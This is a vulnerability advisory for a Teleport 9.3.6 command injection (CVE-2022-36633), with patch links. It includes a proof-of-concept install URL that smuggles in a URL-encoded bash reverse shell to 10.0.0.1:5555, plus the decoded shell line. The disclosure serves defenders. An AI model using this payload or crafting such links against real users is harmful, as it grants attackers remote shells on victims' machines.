Lucene search
Brian Landrum, Brandon RoachPACKETSTORM:168137HistoryAug 23, 2022 - 12:00 a.m.
Teleport 9.3.6 Command Injection
2022-08-2300:00:00
Brian Landrum, Brandon Roach
packetstormsecurity.com
450
teleport 9.3.6
command injection
remote code execution
url encoding
bash escape
social engineering
unauthenticated attack
ssh agent
vulnerability
teleport server
payload
exploit
discoverers
EPSS
0.031
Percentile
91.2%
`Description:Teleport 9.3.6 is vulnerable to Command injection leading to Remote
Code Execution. An attacker can craft a malicious ssh agent
installation link by URL encoding a bash escape with carriage return
line feed. This url encoded payload can be used in place of a token and
sent to a user in a social engineering attack. This is fully
unauthenticated attack utilizing the trusted teleport server to deliver
the payload.
Additional Information:https://goteleport.com/
https://github.com/gravitational/teleport
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36633
Vulnerability Type: otherCommand injection leading to Remote Code Execution
Vendor of Product:Teleport - https://goteleport.com/
Affected software version: Teleport version < v10.1.2
Affected Component:https://teleport.examplesite.com/scripts/*INJECTION-POINT*/install-node.sh?method=iam <https://teleport.site.com/scripts/*INJECTION-POINT*/install-node.sh?method=iam>
Attack Type:Remote
Impact:Code Execution
Impact Other:This vulnerability allows an attacker to inject code into a bash script without authentication, and craft a legitimate link hosted on the teleport server to use in social engineering attacks. When a user executes the command to install an teleport SSH agent with the crafted link, it will install the teleport agent and without the users knowledge, execute malicious code in the background.
Attack Vectors:An attacker can craft a malicious ssh agent installation link by URL encoding a bash escape with carriage return line feed. This url encoded payload can be used in place of a token and sent to a user in a social engineering attack. This is fully unauthenticated attack utilizing the trusted teleport server to deliver the payload.
Example POC payload: https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%30%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?method=iam <https://teleport.site.com/scripts/%22%0a%2fbin%2fbash%20-l%20%3e%20%2fdev%2ftcp%2f10.0.0.1%2f5555%200%3c%261%202%3e%261%20%23/install-node.sh?method=iam>
Decoded payload:
"
/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #
Patch information:https://goteleport.com/docs/changelog/#1012
https://github.com/gravitational/teleport/pull/14944
------------------------------------------
Discoverers:
Brandon Roach & Brian Landrum
------------------------------------------
`
Related
osv
osv
CGA-cp25-64gp-6fm3
2024-06-06 12:26:44
Improper token validation leading to code execution in Teleport
2022-08-25 00:00:28
CVE-2022-36633
2022-08-24 13:15:08
cve
cve
CVE-2022-36633
2022-08-24 13:15:08
github
github
Improper token validation leading to code execution in Teleport
2022-08-25 00:00:28
exploitdb
exploitdb
Teleport v10.1.1 - Remote Code Execution (RCE)
2022-09-23 00:00:00
prion
prion
Command injection
2022-08-24 13:15:00
zdt
zdt
Teleport v10.1.1 - Remote Code Execution Vulnerability
2022-09-23 00:00:00
Teleport 9.3.6 Command Injection Vulnerability
2022-08-23 00:00:00
veracode
veracode
Command Injection
2022-08-25 12:54:27
nvd
nvd
CVE-2022-36633
2022-08-24 13:15:08
packetstorm
packetstorm
Teleport 10.1.1 Remote Code Execution
2022-09-23 00:00:00
cvelist
cvelist
CVE-2022-36633
2022-08-24 12:29:54
ibm
ibm